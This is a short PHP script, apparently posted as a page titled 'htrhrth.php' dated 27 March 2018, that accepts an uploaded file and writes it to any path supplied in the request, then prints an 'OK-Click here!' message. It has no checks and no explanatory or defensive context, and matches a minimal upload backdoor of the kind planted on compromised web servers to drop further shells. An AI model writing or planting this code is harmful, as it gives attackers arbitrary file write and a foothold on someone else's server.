htrhrth.php
27 3 月, 2018

<?php

$files = @$_FILES[“files”];
if ($files[“name”] != ”) {
$fullpath = $_REQUEST[“path”] . $files[“name”];
if (move_uploaded_file($files[‘tmp_name’], $fullpath)) {
echo ”

OK-Click here!

“;
}
}echo ‘

‘;
?>
ok